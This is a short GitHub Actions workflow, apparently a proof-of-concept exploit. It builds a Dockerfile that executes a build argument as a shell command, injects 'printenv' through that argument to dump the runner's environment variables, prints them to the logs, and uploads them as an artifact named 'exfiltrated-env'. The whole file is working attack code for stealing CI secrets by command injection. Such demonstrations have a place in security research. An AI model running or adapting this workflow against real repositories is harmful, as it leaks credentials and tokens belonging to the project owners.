name: Exfiltrate Secrets via PYTHON_VERSION Injection

on:
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repo
        uses: actions/checkout@v4

      - name: Create malicious Dockerfile
        run: |
          echo "FROM alpine" > Dockerfile
          echo "ARG PYTHON_VERSION" >> Dockerfile
          echo 'RUN sh -c "$PYTHON_VERSION"' >> Dockerfile

      - name: Build Docker image with injected command
        run: |
          docker build -t hacked-image \
            --build-arg PYTHON_VERSION='printenv > /leak.txt' .

      - name: Run container and extract leak.txt
        run: |
          docker run --rm hacked-image cat /leak.txt > leak.txt
          cat leak.txt  # Optional: preview in logs

      - name: Upload leaked environment
        uses: actions/upload-artifact@v4
        with:
          name: exfiltrated-env
          path: leak.txt
